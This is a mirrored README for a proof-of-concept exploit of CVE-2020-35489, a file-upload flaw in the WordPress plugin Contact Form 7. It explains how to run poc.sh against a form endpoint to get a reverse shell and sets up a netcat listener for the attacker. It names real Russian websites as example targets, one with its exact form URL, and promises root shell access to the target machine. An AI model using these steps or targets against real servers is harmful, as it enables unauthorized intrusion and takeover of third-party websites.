关联漏洞
描述
poc-CVE-2020-35489
介绍
# CVE-2020-35489 POC


## About
* https://nvd.nist.gov/vuln/detail/CVE-2020-35489
* https://blog.wpsec.com/contact-form-7-vulnerability/
* https://www.secpod.com/blog/wordpress-plugin-contact-form-7-critical-file-upload-vulnerability-cve-2020-35489/
* https://help.stoik.io/de/cve-2020-35489
## Usage
```bash
bash poc.sh url loc_ip loc_port
```
`loc_ip` is an attacker machine ip which gets the reverse shell
`loc_ip` is an attacker machine port which gets the reverse shell
`url` is a vulnerable site url (not a domain)
## What is vulnerable url?
[nuclei](https://github.com/projectdiscovery/nuclei) scanner detects this cve as a critical in the following form (all example sites in this doc are rendered immune):
```text
[CVE-2020-35489] [http] [critical] https://ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://majestic.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [4.6]
[CVE-2020-35489] [http] [critical] https://www.ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://www.ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
```
The scanner does not provide the vulnerable url, however. For the exploit to work, you should do some research and find the form on the detected site which uses the plugin.
For example, let's look on http://itws.ru/?page_id=29

When we submit the form, we can notice the url involved:

This is what the poc script takes as a parameter: `http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback`
For that domain:
```bash
bash poc.sh http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback your_machine_ip your_ip_port
```
## Reverse shell
If the exploit is successful, you get shell to the specified ip and port.
### Example
You bought a cloud instance for exploit whose ip is 145.21.32.5. You ssh-ed into the instance and run `nc -l 11244`. You ssh-ed from the second terminal and run the `poc.sh`:
```bash
bash poc.sh https://example.com/wp-url 145.21.32.5 11244
```
If the exploit is successful, you get root shell access to the target machine with `nc` in the first ssh terminal.
If you test the poc being **behind router**, don't forget to **forward port** on which reverse shell is listening.
文件快照
[4.0K] /data/pocs/9e4c67158d55f7955ea6657d148d447df6c056d0
├── [4.0K] images
│ ├── [ 52K] itws2.png
│ ├── [404K] itws.png
│ ├── [ 13K] poc-CVE-2020-35489-revshell.svg
│ └── [ 47K] poc-CVE-2020-35489-running-sploit.svg
├── [ 39K] payload.pdf
├── [ 587] poc.sh
└── [2.6K] README.md
1 directory, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。